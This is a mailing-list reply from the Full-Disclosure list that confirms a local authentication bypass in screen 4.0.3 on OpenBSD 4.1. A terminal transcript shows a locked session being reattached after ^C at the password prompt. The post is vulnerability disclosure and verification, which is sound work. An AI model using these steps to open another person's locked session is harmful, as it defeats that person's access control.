Re: [Full-disclosure] screen 4.0.3 local Authentication Bypass

-----Original Message-----
Subject: Re: [Full-disclosure] screen 4.0.3 local Authentication Bypass

> Verified on OpenBSD

I'm not seeing a 'Getpass error' message on 4.1-STABLE current, but there
does seem to be a problem with locking and reattaching:

$ screen
[space]
$ echo "This is the locked screen"
This is the locked screen
[^A^X]
Key: [asdf\r]
Again: [asdf\r]
Screen used by Paul <paul>.
Password: [^C]
$ [\r]
$ screen -r
$ echo "This is the locked screen"
This is the locked screen
$ exit
[screen is terminating]
$ uname -rmsv
OpenBSD 4.1 GENERIC.MP#0 i386

PaulM

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/